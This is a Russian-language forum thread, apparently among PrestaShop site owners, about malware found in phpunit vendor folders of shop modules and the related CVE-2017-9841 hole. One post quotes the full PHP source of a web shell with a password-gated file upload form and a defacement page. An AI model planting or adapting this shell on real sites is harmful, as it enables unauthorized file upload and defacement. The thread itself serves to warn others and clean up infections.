Информация Вредоносний код - Malware, вирусы и др.

alexen_zhukov

Постоялец
Регистрация
4 Мар 2013
Сообщения
132
Реакции
186
Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.
 
Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.
Для просмотра ссылки Войди или Зарегистрируйся

Оно?

Код:
<?php
echo "Coded By Xsam Xadoo - BoT Auto Shell Upload\n ";
echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";
$Sam = $_GET['Xsam'];
if($Sam == 'Xadoo'){
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
    if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
    echo "Upload Success";
    } else {
    echo "Upload Failed Check permission";
    }
}
}
$file = '<title>Hacked by Xsam Xadoo </title><center><div id=q>Hacked by XsamXadoo <br><font size=2>Email: Xsam0.Xadoo0@gmail.com
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}</style>';

$r=fopen("Xsam_Xadoo.html", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../Xsam_Xadoo.html", "w"); fwrite($r,$file); fclose($r);
?>

Скрытое содержимое доступно для зарегистрированных пользователей!
 
Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.

Покажите что было в /modules/autoupgrade/vendor/phpunit/phpunit/src/Util/eval-stdin.php. Похоже на CVE-2017-9841.
 
Примечательно, что дыры касаются как раз пш 1.7.
 
Примечательно, что дыры касаются как раз пш 1.7.

в ядре 1.7 всё было и есть ОК

вопрос про модули и их эффективное использование

(через эту болячку проходят все CMS, включая Жумлу, Вордпресс и т.п.)

всё будет ОК
 
Я у себя нашел это в магазине на 1.6, удалил и на всякий закрыл доступ в папку modules, открываю только когда что-то ставлю и потом опять закрываю
 
а где нашел? я не нашел .../vendor/...
 
Это было в одном магазине из 7-ми, причем его обнаружил антивирус с хостинга (который на IspManager стоит по умолчанию ImunifyAV (ex. Revisium) Free)
 
Были такие проблемы, прочекал сайт айболитом, снес подозрительные файлы и все прошло
 
Назад
Сверху